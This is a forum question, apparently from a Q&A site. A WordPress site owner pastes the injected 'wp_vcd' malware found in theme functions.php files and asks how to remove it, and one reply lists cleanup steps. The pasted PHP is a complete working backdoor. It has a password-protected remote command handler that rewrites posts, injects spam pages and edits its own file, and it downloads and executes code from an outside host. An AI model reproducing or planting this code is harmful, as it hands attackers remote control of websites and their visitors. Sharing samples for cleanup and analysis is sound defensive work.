All WordPress site hacked on my server code injection [duplicate]

This question already has an answer here:

I’ve been searching this for too long but didn’t find any solution regarding this issue. Today I am seeing the below code in all my wordpress sites hosting on the same server its injecting in themes functions.php files.

Please help! how to remove this?

<?php



if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'db390680f4bc0d087d6824781eabbdaa'))

    {

$div_code_name="wp_vcd";

        switch ($_REQUEST['action'])

            {

                case 'get_all_links';

                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)

                        {

                            $data['code'] = '';



                            if (preg_match('!<div id="'.$div_code_name.'">(.*?)</div>!s', $data['post_content'], $_))

                                {

                                    $data['code'] = $_[1];

                                }



                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "rn";

                        }

                break;



                case 'set_id_links';

                    if (isset($_REQUEST['data']))

                        {

                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');



                            $post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);

                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="'.$div_code_name.'">' . stripcslashes($_REQUEST['data']) . '</div>';



                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)

                                {

                                    print "true";

                                }

                        }

                break;



                                case 'change_div';

                    if (isset($_REQUEST['newdiv']))

                        {



                            if (!empty($_REQUEST['newdiv']))

                                {

                                                                           if ($file = @file_get_contents(__FILE__))

                                                                            {

                                                                                                 if(preg_match_all('/$div_code_name="(.*)";/i',$file,$matcholddiv))

                                                                                                             {

                                                                                                   echo $matcholddiv[1][0];

                                                                                       $file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);

                                                                                       @file_put_contents(__FILE__, $file);

                                                               print "true";

                                                                                                             }





                                                                            }

                                }

                        }

                break;



                case 'change_domain';

                    if (isset($_REQUEST['newdomain']))

                        {



                            if (!empty($_REQUEST['newdomain']))

                                {

                                                                           if ($file = @file_get_contents(__FILE__))

                                                                            {

                                                                                                 if(preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code.php/i',$file,$matcholddomain))

                                                                                                             {



                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);

                                                                                       @file_put_contents(__FILE__, $file);

                                                               print "true";

                                                                                                             }





                                                                            }

                                }

                        }

                break;



                case 'create_page';

                    if (isset($_REQUEST['remove_page']))

                        {

                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))

                                {

                                    print "true";

                                }

                        }

                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))

                        {

                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))

                                {

                                    print "true";

                                }

                        }

                break;



                default: print "ERROR_WP_ACTION WP_V_CD";

            }



        die("");

    }





if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )

    {

        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');

        if ($data -> full_content)

            {

                print stripslashes($data -> content);

            }

        else

            {

                print '<!DOCTYPE html>';

                print '<html ';

                language_attributes();

                print ' class="no-js">';

                print '<head>';

                print '<title>'.stripslashes($data -> title).'</title>';

                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';

                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';

                print '<meta name="robots" content="index, follow" />';

                print '<meta charset="';

                bloginfo( 'charset' );

                print '" />';

                print '<meta name="viewport" content="width=device-width">';

                print '<link rel="profile" href="http://gmpg.org/xfn/11">';

                print '<link rel="pingback" href="';

                bloginfo( 'pingback_url' );

                print '">';

                wp_head();

                print '</head>';

                print '<body>';

                print '<div id="content" class="site-content">';

                print stripslashes($data -> content);

                get_search_form();

                get_sidebar();

                get_footer();

            }



        exit;

    }





if ( ! function_exists( 'wp_temp_setup' ) ) {  

$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];



if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))

{





function wp_temp_setup($phpCode) {

    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");

    $handle = fopen($tmpfname, "w+");

    fwrite($handle, "<?phpn" . $phpCode);

    fclose($handle);

    include $tmpfname;

    unlink($tmpfname);

    return get_defined_vars();

}



extract(wp_temp_setup($tmpcontent));

}

}









?>

Read more here: All WordPress site hacked on my server code injection [duplicate]

1 thought on “All WordPress site hacked on my server code injection [duplicate]

  1. What I did to slove problem
    1. In wp-include directory, delete wp-vcd.php and class.wp.php files
    2. In wp-include directory, open post.php and detele first php tag added by Malware.
    3. Open to theme’s functions.php file, and delete the above codes.

Leave a Reply

Your email address will not be published. Required fields are marked *